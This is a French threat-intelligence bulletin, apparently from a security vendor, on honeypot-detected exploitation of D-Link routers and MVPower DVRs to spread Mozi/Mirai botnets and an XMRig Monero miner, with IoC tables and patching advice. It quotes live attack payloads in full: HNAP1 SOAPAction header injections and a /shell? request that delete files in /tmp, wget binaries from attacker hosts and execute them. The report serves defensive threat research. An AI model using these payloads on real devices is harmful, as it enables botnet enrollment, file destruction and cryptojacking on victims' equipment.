Cette semaine, sur le réseau de TEHTRIS Deceptive Response, notre équipe de Threat Research a détecté des tentatives d’exploitation sur des appareils IoT vulnérables tels que des routeurs D-Link ou des enregistreurs vidéo-surveillance MVPower, dans le but de les enrôler dans des botnets ou de faire du minage de cryptomonnaie.
Sommaire
Tentative d’exploiter des routers D-Link vulnérables
TEHTRIS a observé des activités malveillantes visant à identifier et exploiter des routeurs D-Link vulnérables.
Téléchargement du botnet Mozi
Ces tentatives d’attaque sur des routeurs D-Link exposés pourraient s’inscrire dans une campagne mise en avant par les chercheurs de Palo Alto en août 2022[1], visant à propager MooBot, un variant du malware Mirai s’attaquant aux appareils vulnérables sous Linux. Les appareils compromis deviennent des bots dans une armée de botnet utilisée à des fins malveillantes pour lancer des attaques DDoS.
La requête URL est /HNAP1/. Le header http contient les éléments suivants :
['soapaction: http://purenetworks[.]com/HNAP1/`cd /tmp && rm -rf * && wget http://101.0.32[.]235:58211/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`', 'content-type: text/xml; charset="utf-8"']
- Un champ “soapaction” avec une URL Purenetwork qui sert à exploiter la vulnérabilité
- Une séquence de commandes Unix (Linux) pour déclencher les actions suivantes :
- cd /tmp : permettant de se déplacer dans le répertoire /tmp (où se trouvent les fichiers temporaires)
- rm -rf * : visant à supprimer tous les fichiers localisés dans le fichier courant (/tmp) pour « nettoyer » l’environnement et s’assurer que les étapes suivantes se dérouleront sans encombre
- wget http://101.0.32[.]235:58211/Mozi.m : pour télécharger le fichier Mozi.m depuis l’adresse IP de l’attaquant sur le port 58211
- chmod 777 /tmp/Mozi.m : permettant de donner les droits d’exécution au fichier Mozi.m
- /tmp/Mozi.m : pour exécuter le fichier Mozi.m (un botnet)
Les commandes wget détectées par TEHTRIS font appel aux 34 adresses IP et ports ci-dessous (IoC):
|
IP |
PORT |
PAYS |
AS |
|
102.33.43[.]180 |
41657 |
ZA |
AS327782 METROFIBRE-NETWORX |
|
103.177.184[.]238 |
35708 |
IN |
AS133661 NETPLUS BROADBAND SERVICES PRIVATE LIMITED |
|
103.183.33[.]151 |
44513 |
IN |
AS133661 NETPLUS BROADBAND SERVICES PRIVATE LIMITED |
|
111.61.154[.]108 |
52431 |
CN |
AS24547 HEBEI MOBILE COMMUNICATION COMPANY LIMITED |
|
112.248.121[.]159 |
41418 |
CN |
AS4837 CHINA UNICOM CHINA169 BACKBONE |
|
115.197.16[.]182 |
56929 |
CN |
AS4134 CHINANET |
|
115.208.130[.]40 |
56453 |
CN |
AS4134 CHINANET |
|
115.214.105[.]133 |
52092 |
CN |
AS4134 CHINANET |
|
115.52.21[.]98 |
36522 |
CN |
AS4837 CHINA UNICOM CHINA169 BACKBONE |
|
117.198.248[.]77 |
51366 |
IN |
AS9829 NATIONAL INTERNET BACKBONE |
|
117.217.146[.]136 |
57716 |
IN |
AS9829 NATIONAL INTERNET BACKBONE |
|
117.248.53[.]4 |
38607 |
IN |
AS9829 NATIONAL INTERNET BACKBONE |
|
117.63.41[.]64 |
51007 |
CN |
AS4134 CHINANET |
|
120.83.139[.]253 |
48258 |
CN |
AS17816 CHINA UNICOM IP NETWORK CHINA169 GUANGDONG PROVINCE |
|
121.146.43[.]89 |
52936 |
KR |
AS4766 KOREA TELECOM |
|
123.10.134[.]251 |
34082 |
CN |
AS4837 CHINA UNICOM CHINA169 BACKBONE |
|
123.4.76[.]90 |
38002 |
CN |
AS4837 CHINA UNICOM CHINA169 BACKBONE |
|
124.91.229[.]171 |
42558 |
CN |
AS4837 CHINA UNICOM CHINA169 BACKBONE |
|
125.43.187[.]57 |
36302 |
CN |
AS4837 CHINA UNICOM CHINA169 BACKBONE |
|
163.125.14[.]69 |
44713 |
CN |
AS17623 CHINA UNICOM SHENZEN NETWORK |
|
182.119.203[.]8 |
33233 |
CN |
AS4837 CHINA UNICOM CHINA169 BACKBONE |
|
2.143.34[.]209 |
38389 |
ES |
AS3352 TELEFONICA DE ESPANA S.A.U. |
|
200.110.58[.]246 |
56319 |
BO |
AS27839 COMTECO LTDA |
|
202.164.131[.]68 |
47322 |
IN |
AS17465 CABLE ISP IN INDIA |
|
210.89.58[.]46 |
39424 |
IN |
AS133661 NETPLUS BROADBAND SERVICES PRIVATE LIMITED |
|
210.89.58[.]95 |
46472 |
IN |
AS133661 NETPLUS BROADBAND SERVICES PRIVATE LIMITED |
|
221.5.62[.]248 |
50039 |
CN |
AS17816 CHINA UNICOM IP NETWORK CHINA169 GUANGDONG PROVINCE |
|
27.45.39[.]192 |
42667 |
CN |
AS17816 CHINA UNICOM IP NETWORK CHINA169 GUANGDONG PROVINCE |
|
39.74.100[.]178 |
44354 |
CN |
AS4837 CHINA UNICOM CHINA169 BACKBONE |
|
42.228.194[.]25 |
45252 |
CN |
AS4837 CHINA UNICOM CHINA169 BACKBONE |
|
42.230.87[.]201 |
34163 |
CN |
AS4837 CHINA UNICOM CHINA169 BACKBONE |
|
58.46.196[.]9 |
36279 |
CN |
AS4134 CHINANET |
|
59.92.167[.]106 |
43448 |
IN |
AS9829 NATIONAL INTERNET BACKBONE |
Téléchargement d’un mineur de cryptomonnaie
TEHTRIS a également détecté des tentatives d’exploitation de routeurs D-Link pour télécharger un logiciel de cryptominage.
Le header http contient les éléments suivants :
['accept-encoding: gzip, deflate', 'soapaction: "http://purenetworks.com/HNAP1/GetDeviceSettings/`cd && cd tmp && export PATH=$PATH:. && cd /tmp; rm -rf xmr*; pkill xmrig*; wget https[:]//github[.]com/xmrig/xmrig/releases/download/v6.18.0/xmrig-6.18.0-linux-x64.tar.gz && tar -xvf xmrig-6.18.0-linux-x64.tar.gz && cd xmrig-6.18.0 && screen ./xmrig -o stratum+tcp://randomxmonero.auto.nicehash.com:9200 -u 31pTFN66yAMH2MGnus7fhsTcA4uGJJ2D7J.test -p x -k --nicehash --coin monero -a rx/0; ./xmrig -o stratum+tcp://randomxmonero.auto.nicehash.com:9200 -u 31pTFN66yAMH2MGnus7fhsTcA4uGJJ2D7J.test -p x -k --nicehash --coin monero -a rx/0`"', 'accept: */*', 'connection: keep-alive']
L’attaquant tente de télécharger le logiciel de cryptominage XMRig depuis GitHub et de miner du Monero.
Les adresses IP ci-dessous ont effectué ces requêtes sur les leurres informatiques de TEHTRIS :
| IP | Country | AS |
| 34.159.120[.]11 | DE | AS396982 GOOGLE-CLOUD-PLATFORM |
| 34.89.116[.]57 | GB | |
| 104.196.255[.]198 | US | |
| 34.85.144[.]234 | US |
Ces types de headers (« soapaction: « http://purenetworks.com/HNAP1/GetDeviceSettings/`cd && cd tmp && export PATH=$PATH:. && ») sont utilisés par un module Metasploit et peuvent être personnalisés avec ce que l’on choisit d’y ajouter à la suite. De ce fait, c’est une méthode très connue et facile à employer, même pour des hackers peu qualifiés.
TEHTRIS recommande de mettre à jour vos routeurs D-Link pour patcher les vulnérabilités exploitées dans ce type d’attaques.
Des vulnérabilités de MVPower DVR ciblées par le malware Mirai
Par ailleurs, TEHTRIS a repéré des traces du malware Mirai qui prend le contrôle à distance d’appareils opérés sous Linux. En effet, des requêtes http/HTTPS étaient associées à l’User Agent « Hello, world », spécifique au malware Mirai. 465 adresses IP différentes ont lancé ces requêtes en semaine 38.
La requête suivante a été observée :
/shell?cd+/tmp;rm+-rf+*;wget+185.216.71.192/jaws;sh+/tmp/jaws
L’attaquant tente d’exploiter une vulnérabilité d’exécution de commande Shell sur les enregistreurs vidéo-surveillance MWPower, ce qui lui permettrait d’exécuter des commandes à distance sur les systèmes vulnérables.
Ci-dessous les serveurs malveillants appelés par les commandes wget :
| IP / Domain Name | PORT | Country | ADDITIONAL INFORMATION |
| 103.159.64[.]218 | – | SG | AS395092 SHOCK-1 |
| 149.56.32[.]172 | – | CA | AS 16276 OVH SAS |
| 158.69.162[.]106 | – | CA | AS 16276 OVH SAS |
| 185.10.57[.]10 | – | NL | AS 51430 ALTUSHOST B.V. |
| 185.216.71[.]192 | – | NL | AS 211252 DELIS LLC Plus de 170 adresses IP ayant tenté d’exploiter cette vulnérabilité sur les honeypots de TEHTRIS renvoyaient vers ce serveur. |
| 41.216.189[.]209 | – | DE | AS 211138 PRIVATE-HOSTING DI CIPRIANO OSCAR 7 adresses IP chinoises ayant mené ces tentatives d’attaques sur les honeypots de TEHTRIS renvoyaient vers ce serveur. |
| 45.124.84[.]209 | – | VN | AS 135967 BACH KIM NETWORK SOLUTIONS JOIN STOCK COMPANY |
| 79.110.62[.]227 | – | US | AS 211252 DELIS LLC |
| 81.161.229[.]46 | – | US | AS 211252 DELIS LLC Plus de 70 adresses IP ayant mené ces tentatives d’attaques sur les honeypots de TEHTRIS renvoyaient vers ce serveur. |
| 91.122.37[.]169 | – | RU | AS 12389 ROSTELECOM |
| 123.97.144[.]204 | 60082 | CN | AS 4134 CHINANET |
| 171.125.249[.]180 | 50882 | CN | AS 4837 CHINA UNICOM CHINA169 BACKBONE |
| 183.150.97[.]46 | 48304 | CN | AS 4134 CHINANET |
| 222.141.40[.]148 | 42134 | CN | AS 4837 CHINA UNICOM CHINA169 BACKBONE |
| 27.45.14[.]109 | 37775 | CN | AS 17816 CHINA UNICOM IP NETWORK CHINA169 GUANGDONG PROVINCE |
| 41.86.19[.]86 | 40901 | LR | AS 37203 LIBTELCO |
| 42.238.249[.]137 | 40463 | CN | AS 4837 CHINA UNICOM CHINA169 BACKBONE |
| 46.10.229[.]163 | 53653 | BG | AS 8866 VIVACOM |
| botnet.psscc[.]cn | – | – | Créé le 2022-06-09 Ce nom de domaine est associé à l’adresse IP 81.161.229[.]46 (AS 211252 DELIS LLC US), considérée malveillante sur de nombreuses bases de données publiques et directement mentionnée dans plus de 70 requêtes détectées cette semaine. |
| jx.qingdaosheng[.]com | – | – | Créé le 2022-03-20 Ce nom de domaine est associé à l’adresse IP 156.234.211[.]155 (AS131685 SUN NETWORK HONG KONG LIMITED HK), listée sur des blacklists publiques. |
| networkmapping[.]xyz | – | – | Ce nom de domaine est associé à l’adresse IP 20.187.116[.]78 (AS8075 Microsoft Corporation HK) considéré malveillante par plusieurs bases de données publiques. |
| whitesecurity[.]xyz | – | – | Créé le 2021-12-12 Ce nom de domaine est associé à l’adresse IP 185.38.142[.]79 (AS47674 NET SOLUTIONS – CONSULTORIA EM TECNOLOGIAS DE INFORMACAO, PT), connu de bases de données publiques pour conduire des activités malveillantes. |
TEHTRIS recommande de blacklister les flux entrants des adresses IP mentionnées ci-dessus, ainsi que de constamment effectuer les mises à jour disponibles sur vos objets connectés pour patcher les vulnérabilités.